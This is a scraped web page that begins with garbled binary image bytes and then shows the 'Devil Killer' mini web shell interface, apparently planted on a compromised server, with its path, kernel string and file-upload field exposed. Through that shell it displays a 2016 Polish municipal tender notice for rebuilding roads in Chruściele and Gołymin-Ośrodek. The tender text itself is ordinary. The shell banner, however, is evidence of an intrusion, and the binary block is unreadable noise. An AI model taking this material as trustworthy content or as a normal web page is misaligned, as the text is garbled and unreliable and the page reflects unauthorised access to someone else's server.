JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/158853-N-2016.html

<p class="kh_header"><b>Gołymin-Ośrodek: PRZEBUDOWA DRÓG GMINNYCH NA TERENIE GMINY GOŁYMIN-OŚRODEK Z PODZIAŁEM NA ZADANIA W MIEJSCOWOŚCIACH: CHRUŚCIELE I GOŁYMIN-OŚRODEK.</b><br>
<b>Numer ogłoszenia: 158853 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gołymin-Ośrodek , ul. Szosa Ciechanowska 8, 06-420 Gołymin-Ośrodek, woj. mazowieckie, tel. 23 671 60 20, faks 23 671 60 93.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DRÓG GMINNYCH NA TERENIE GMINY GOŁYMIN-OŚRODEK Z PODZIAŁEM NA ZADANIA W MIEJSCOWOŚCIACH: CHRUŚCIELE I GOŁYMIN-OŚRODEK..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa dróg gminnych w miejscowościach: Chruściele i Gołymin-Ośrodek z podziałem na Części - odrębne zadania inwestycyjne.Każdą z części trzeba traktować tak jakby to było oddzielne zamówienie.Na każdą z w/w Części zamówienia zostanie wybrany Wykonawca i zostanie podpisana oddzielna umowa.
Część 1 - zadanie pn. Przebudowa drogi gminnej nr 120441W w miejscowości Chruściele.Przebudowa drogi gminnej nr 120441W w miejscowości Chruściele na długości 308.82 m, szerokość jezdni zmienna 4,50 - 5,00 m.Miejsce realizacji zamówienia:Inwestycja realizowana będzie na działce nr 122 położonej w obrębie geodezyjnym Wróblewko na terenie miejscowości Chruściele.Zakres prac obejmuje:
a) Roboty przygotowawcze :-  roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym (w tym wykonanie inwentaryzacji geodezyjnej powykonawczej) b) Jezdnia : - podbudowa z kruszywa naturalnego - warstwa górna o grubości 5cm po zagęszczeniu - warstwa wyrównawcza z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm. - powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 16-25 w ilości 18,0 dm3/m2 - warstwa 1 - powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 12-16 w ilości 13,0 dm3/m2 - warstwa 2
- powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem   
kamiennym frakcji 8-12 w ilości 10,0 dm3/m2 - warstwa 3 - powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym frakcji 5-8 w ilości 8,0 dm3/m2 - warstwa 4.c) Inżynieria ruchu :- słupki do znaków drogowych z rur stalowych o średnicy 50 mm - przymocowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych o powierzchni do 0,3 m2. d) Roboty wykończeniowe :- odtworzenie rowów - wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0,25 m3 na odkład  w gruncie kat. I - II 0 objętości do 1,50 m3/m. Część 2 - zadanie pn. Przebudowa ul. Ogrodowej (drogi wewnętrznej) w miejscowości Gołymin-Ośrodek. Przebudowa ul. Ogrodowej (drogi wewnętrznej) w miejscowości Gołymin-Ośrodek na długości 168,34 m, szerokość jezdni 5,0 m. Miejsce realizacji zamówienia:Inwestycja realizowana będzie na działkach nr 197 i nr 203/1 położonych w obrębie geodezyjnym Gołymin-Ośrodek. Zakres prac obejmuje:a) Roboty przygotowawcze :-  roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym (w tym wykonanie inwentaryzacji geodezyjnej powykonawczej)-  ręczne usunięcie warstwy ziemi urodzajnej (humusu) o grubości 15 cm z darnią z przewozem taczkami. b) Jezdnia :
- podbudowa z kruszywa naturalnego - warstwa górna o grubości 5cm po zagęszczeniu- warstwa wyrównawcza z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm.- nawierzchnia z mieszanek mineralno - bitumicznych grysowych - warstwa wiążąca asfaltowa - grubości po zagęszczeniu 4 cm.- nawierzchnia mieszanek mineralno - bitumicznych grysowych - warstwa ścieralna
asfaltowa - grubość po zgęszczeniu 4 cm. c) Przepusty:- oczyszczenie przepustów  o śr. 1.0 m z namułu.d) Inżynieria ruchu :- słupki do znaków drogowych z rur stalowych o średnicy 50 mm - przymocowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych,informacyjnych o powierzchni do 0,3 m2. e) Roboty wykończeniowe :- odtworzenie rowów - wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0,25 m3 na odkład   w gruncie kat. I - II 0 objętości do 1,50 m3/m - regulacja pionowa studzienek dla zaworów wodociągowych i gazowych.Zamawiający dołącza do SIWZ przedmiary robót i wzory kosztorysów ofertowych na wszystkie 2 zadania inwestycyjne. Stanowią one wyłącznie materiał pomocniczy do sporządzenia szczegółowych kosztorysów ofertowych (do obliczenia ceny oferty). Kosztorysy ofertowe należy dołączyć do Oferty. Szczegółowy opis przedmiotu zamówienia zawarty jest w załącznikach do SIWZ:
1)Dokumentacje projektowe (projekty budowlane)
2)Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót.
3)Projekty czasowej organizacji ruchu.
4)Projekty stałej organizacji ruchu. 
5)Przedmiary robót .
6)Kosztorysy ofertowe Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych, a wszelkie towary określone w dokumentacji, pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego. Poprzez zapis dot. minimalnych parametrów jakościowych wymagań Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Zamawiający przy opisie przedmiotu zamówienia wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy.
Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza zastosowanie przez wykonawców rozwiązań równoważnych w stosunku do rozwiązań opisanych w niniejszej specyfikacji istotnych warunków zamówienia.Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe a jednocześnie oznacza to, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych.Wykonawca, który w ofercie powoła się na zastosowanie rozwiązań równoważnych opisywanym w specyfikacji istotnych warunków zamówienia, jest obowiązany wykazać, że oferowane przez niego roboty budowlane, towary i materiały spełniają wymagania określone przez zamawiającego poprzez złożenie stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, lub innego uprawnionego specjalistę wyznaczonego przez zamawiającego (w ramach nadzoru autorskiego), który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez zamawiającego decyzji o odrzuceniu oferty z powodu nierówno ważności zaproponowanych zamienników. 

8. Szczegółowy zakres obowiązków Wykonawcy zawiera wzór umowy zamieszczony w SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest do wniesienia wadium. 
1.Ustala się wadium oddzielnie dla każdej z części zamówienia:
Wadium dla zadania 1 (Cześć 1) - Przebudowa drogi gminnej nr 120441W                w miejscowości Chruściele -  wynosi 1 200,00 zł. Słownie wysokość wadium: jeden tysiąc dwieście złotych. 
Wadium dla zadania 2 (Część 2) - Przebudowa ul. Ogrodowej (drogi wewnętrznej) w  miejscowości Gołymin-Ośrodek - wynosi 1 200,00 zł.Słownie wysokość wadium: jeden tysiąc dwieście złotych.2.Wadium może być wnoszone w jednej lub kilku następujących formach (art. 45 ust. 6 UPZP):
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2           ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804).
3. Wykonawca jest zobowiązany do wniesienia wadium przed terminem składania ofert.
4.  Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: BS Pułtusk O/Gołymin, konto nr 73 8232 0005 0300 0550 2003 0002 
Na przelewie proszę napisać znak sprawy IOŚ. 271.5.2016 - wadium do przetargu nieograniczonego dotyczącego Przebudowy dróg gminnych na terenie Gminy Gołymin-Ośrodek - zadanie inwestycyjne pod nazwą(wpisać odpowiednią nazwę zadania) j.n.:
Część 1, zadanie pn. Przebudowa drogi gminnej nr 120441W w miejscowości Chruściele. Część 2, zadanie pn. Przebudowa ul. Ogrodowej (drogi wewnętrznej)       w  miejscowości Gołymin-Ośrodek.Do oferty należy załączyć dowód wpłaty wadium.
W przypadku wadium wnoszonego w pieniądzu, terminem wniesienia wadium jest termin uznania kwoty na rachunku Zamawiającego.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5. W przypadku wniesienia wadium w formie innej niż pieniądz, oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed terminem składania ofert w kasie Urzędu Gminy w Gołyminie-Ośrodku lub dołączyć do oferty w sposób umożliwiający jego wypięcie i zwrot zgodnie z UPZP. 
Kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.
6.  Niewniesienie wadium w terminie lub w sposób niezgodny z określonym             w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu  dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 zamówienie publiczne, dla jednego Zamawiającego, w jednym kontrakcie, polegające na budowie i/lub przebudowie drogi o nawierzchni powierzchniowo utrwalonej emulsją asfaltową i grysami kamiennymi na odcinku długości min. 1,00 km z podaniem jej rodzaju, wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane w sposób należyty oraz wskazujących, że zostały one wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. protokół odbioru końcowego zadania inwestycyjnego itp.). 
Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych (wg załącznika nr 2 do SIWZ), wykazu wykonanych robót budowlanych (wg załącznika nr 5 do SIWZ) oraz dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane   w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Niewykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. braku złożenia oświadczenia o spełnieniu warunku, wykazu wykonanych robót oraz dowodów potwierdzających wykonanie robót, spowoduje wykluczenie z postępowania.
Ponadto Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia, wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu  dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że osoby, którymi dysponuje lub będzie dysponował,  które będą uczestniczyć w wykonywaniu zamówienia, posiadają kwalifikacje, doświadczenie zawodowe oraz uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2016 r., poz. 290) lub wymagane innymi przepisami dokumenty do wykonywania czynności w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - inżynieryjnej w zakresie dróg, z co najmniej 2 letnim stażem na stanowisku kierownika budowy (w rozumieniu ustawy Prawo budowlane).
Wykonawca udokumentuje dysponowanie przynajmniej 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w specjalności konstrukcyjno - inżynieryjnej w zakresie dróg.Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wg załącznika nr 2 do SIWZ), Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (wg załącznika nr 6 do SIWZ) oraz oświadczenia potwierdzającego posiadanie uprawnień budowlanych wykonawczych do sprawowania samodzielnych funkcji technicznych w budownictwie przez wskazane osoby w specjalności konstrukcyjno - inżynieryjnej w zakresie dróg (wg załącznika nr 7 do SIWZ). Niewykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. braku złożenia oświadczenia o spełnieniu warunku, wykazu osób oraz oświadczenia potwierdzającego posiadanie uprawnień budowlanych spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu  dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy wg załącznika nr 1 do SIWZ pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie, jeżeli reprezentacja/reprezentant Wykonawcy działa na podstawie pełnomocnictwa Kosztorys ofertowy (dotyczy każdej z Części zamówienia)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
1)	Zmiana postanowień umowy może nastąpić z powodu zaistnienia nieprzewidzianych okoliczności, w tym siły wyższej;
2)	Zmiana inspektora nadzoru inwestorskiego, kierownika budowy lub kierownika robót może nastąpić w uzasadnionych przypadkach (np. choroby, śmierci, innych zdarzeń losowych) na pisemny wniosek jednej ze stron umowy; z tym, że nowo powołane osoby muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia;
3)	Termin zakończenia niniejszej umowy może ulec zmianie w przypadku  wystąpienia opóźnień wynikających z:
a)	działania siły wyższej (na przykład klęski żywiołowej) mającej bezpośredni wpływ na terminowość wykonania robót - wystąpienia przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada Wykonawca, taką przeszkodą mogą być niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie umowy;
b)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
4)	Wprowadzenie rozwiązań zamiennych, wynikających z przyczyn technicznych, technologicznych i materiałowych;
